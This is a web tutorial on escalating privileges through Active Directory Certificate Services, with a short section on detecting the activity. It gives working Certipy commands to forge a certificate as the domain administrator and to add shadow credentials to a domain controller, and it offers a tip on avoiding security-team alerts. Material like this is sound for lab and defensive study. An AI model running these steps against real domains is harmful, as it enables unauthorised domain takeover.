Mastering AD CS Escalation: A Practical Guide to Exploiting Certificate Services
Overview
Active Directory Certificate Services (AD CS) is a critical component for managing public key infrastructure (PKI) in Windows environments. While it provides essential services like certificate enrollment and authentication, misconfigurations in certificate templates and the misuse of shadow credentials can allow attackers to escalate privileges and move laterally. This guide dissects these advanced exploitation techniques and offers behavioral detection strategies for defenders. By understanding both offensive and defensive perspectives, you can harden your AD CS infrastructure against real-world attacks.
Prerequisites
Before diving into exploitation, ensure you have the following:
- Access to an Active Directory environment with AD CS installed (test lab recommended).
- Administrative privileges on a domain-joined machine or a compromised account with certificate enrollment rights.
- Tools: Certipy (Python-based AD CS exploitation framework), Impacket, BloodHound, and a Windows machine with
certreqcommand-line utility. Install Certipy via pip:pip install certipy-ad. - Basic knowledge of Active Directory, PKI concepts, and PowerShell.
Step-by-Step Instructions
Exploiting Certificate Template Misconfigurations
Certificate templates define policies for issuing certificates. Attackers target templates that allow enrollment by low-privileged users and have dangerous extensions like Client Authentication (EKU) or Smart Card Logon. The goal is to request a certificate that impersonates a high-privileged account (e.g., Domain Admin).
- Identify vulnerable templates using BloodHound or Certipy. Run:
certipy find -u user@domain.local -p 'password' -dc-ip 10.0.0.1
Look for templates where Enrollment Rights include authenticated users and Subject Name is supplied in request. - Request a certificate with a privileged user's UPN. Use Certipy:
certipy req -u user@domain.local -p 'password' -ca 'CA-SERVER\CA-NAME' -template 'VulnTemplate' -upn 'administrator@domain.local'
This outputs a PFX file containing the forged certificate. - Extract the private key for authentication:
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.1. Use the NTLM hash or Kerberos TGT to access domain resources.
For a deeper dive, see the Behavioral Detection section to spot this activity.
Shadow Credentials Misuse
Shadow credentials involve adding a certificate-based credential to a target computer or user object via the msDS-KeyCredentialLink attribute. This allows an attacker to authenticate as that object using PKINIT (Kerberos with certificates).
- Enumerate writable objects where the attacker has permission to modify the attribute. Use BloodHound or
PowerView. - Add a shadow credential to the target (e.g., a Domain Controller). With Certipy:
certipy shadow add -u attacker@domain.local -p 'pass' -target dc01.domain.local - Authenticate as the target using the generated certificate:
certipy auth -pfx dc01.pfx -dc-ip 10.0.0.1. This yields a TGT as the Domain Controller, granting admin access.
Note: Shadow credential attacks often bypass traditional Kerberos protections. Watch for unusual PKINIT requests from non-DC machines—see detection below.
Behavioral Detection for Defenders
Defenders can spot AD CS abuse through audit logs and network telemetry. Key indicators:
- Certificate enrollment events: Event ID 4886 (Certificate Services approved a certificate request) and 4887 (issued certificate). Look for requests from unexpected users or templates.
- Shadow credential additions: Event ID 5136 (Directory Service change) with attribute
msDS-KeyCredentialLink. Correlate with source IPs and user accounts. - PKINIT authentication: Event ID 4768 (Kerberos TGT request) with Certificate Information in the details. Flag requests using certificates not issued to the requesting machine.
Implement monitoring with Windows Event Forwarding and SIEM rules. Use PowerShell to collect logs: Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4768}. For a complete detection guide, refer to the Summary.
Common Mistakes
- Using production credentials in a lab: Always test in an isolated environment. Accidentally issuing a certificate for a real admin can lock you out.
- Neglecting certificate expiry: Forged certificates have a limited lifespan. Ensure you use the certificate before it expires, or request a new one.
- Misconfiguring template permissions: Some templates require the Enroll permission on the CA itself, not just the template. Verify CA security settings.
- Shadow credential cleanup: When testing, removing the added credential is crucial to prevent persistence. Use
certipy shadow remove -target dc01.domain.local. - Ignoring detection logs during testing: To avoid alerting SOCs, perform activities during maintenance windows or with explicit authorization.
Summary
AD CS escalation via template misconfigurations and shadow credential abuse is a potent vector for privilege escalation. By following this guide, you can simulate these attacks to validate your defenses. Key takeaways: (1) identify vulnerable templates using automated tools, (2) leverage Certipy for certificate requests and shadow credential manipulation, and (3) monitor for specific Windows Events to detect misuse. Always operate in a controlled environment and document findings. For further reading, explore Certipy documentation and Unit 42's original analysis.
Related Articles
- U.S. Passports at Risk: New Enforcement of Child Support Debt Rules Explained
- Remoras Found Taking Shelter in Manta Ray Rectums: Scientists 'Amazed and Horrified'
- How to Implement the Block Protocol in Your Web Editor: A Step-by-Step Guide
- Navigating the Passport Revocation Policy for Child Support Debt: A Comprehensive Guide
- 5 Terminal Power Tools That Eliminated My Need for Graphical Apps
- Apple Showcases Creator Studio's Versatility Through Three Inspired Projects
- Apple's June Quarter Guidance: Revenue Growth and Memory Shortage Insights
- How to Transform Defense Innovation: Lessons from Anduril and CEO Brian Schimpf